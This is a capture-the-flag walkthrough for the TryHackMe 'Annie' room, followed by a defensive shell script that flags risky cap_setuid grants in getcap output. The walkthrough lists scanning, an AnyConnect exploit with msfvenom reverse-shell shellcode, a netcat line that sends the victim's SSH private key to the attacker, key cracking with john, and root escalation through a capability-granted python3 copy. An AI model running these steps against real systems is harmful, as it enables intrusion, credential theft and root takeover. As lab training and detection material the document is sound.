Annie

Room Link: https://tryhackme.com/room/annie

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/7070 - AnyConnect

Exploit: https://www.exploit-db.com/raw/49613

Took the code above and just had to change the shellcode and ip variables.

Kali

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

Kali

nc -lvnp 4444

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Victim

cat /home/annie/.ssh/id_rsa
nc -w 3 $KALI 1234 < /home/annie/.ssh/id_rsa

Kali

nc -l -p 1234 > id_rsa
/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

Kali

ssh -i id_rsa annie@$VICTIM

Privilege Escalation

Victim

find / -perm -u=s -type f 2> /dev/null

Victim

cp /usr/bin/python3 /home/annie/python3
setcap cap_setuid+ep /home/annie/python3
ls -al /home/annie/python3
/home/annie/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
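
For defenders, the capability set on the copied interpreter above shows up in `getcap -r /` output. The audit below is an added example, not part of the original write-up; the trusted-directory and interpreter patterns and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag files whose capabilities let them change UID.
# stdin:  lines in the format printed by `getcap -r / 2>/dev/null`
# stdout: reason<TAB>path<TAB>capabilities, one line per finding

# Assumption: directories that only root-installed packages write to.
TRUSTED_DIRS='^/(usr/)?(s?bin|lib|lib64|libexec)/'
# Assumption: interpreters for which cap_setuid amounts to a root shell.
INTERPRETERS='^(python|perl|ruby|php)[0-9.]*$|^(node|bash|dash|sh)$'

flag_risky_caps() {
  while IFS= read -r line; do
    path=${line%% cap_*}               # text before the capability list
    [ "$path" = "$line" ] && continue  # no capability list on this line
    caps=${line#"$path "}
    path=${path% =}                    # older libcap prints "path = caps"
    # Keep only grants with cap_setuid in the effective set (flag "e").
    printf '%s\n' "$caps" | grep -Eq 'cap_setuid[^ ]*[+=][ip]*e' || continue
    if ! printf '%s\n' "$path" | grep -Eq "$TRUSTED_DIRS"; then
      reason=untrusted-path            # e.g. a copy in a home directory
    elif printf '%s\n' "${path##*/}" | grep -Eq "$INTERPRETERS"; then
      reason=interpreter
    else
      reason=baseline-check            # compare with the distro default
    fi
    printf '%s\t%s\t%s\n' "$reason" "$path" "$caps"
  done
}

# Constructed sample input covering both getcap output formats.
sample_getcap() {
  cat <<'EOF'
/usr/bin/ping cap_net_raw=ep
/opt/tool cap_setuid+i
/home/annie/python3 = cap_setuid+ep
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip
/usr/bin/newuidmap cap_setuid=ep
EOF
}

sample_getcap | flag_risky_caps
```

On a live host, feed it real data with `getcap -r / 2>/dev/null | flag_risky_caps`.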
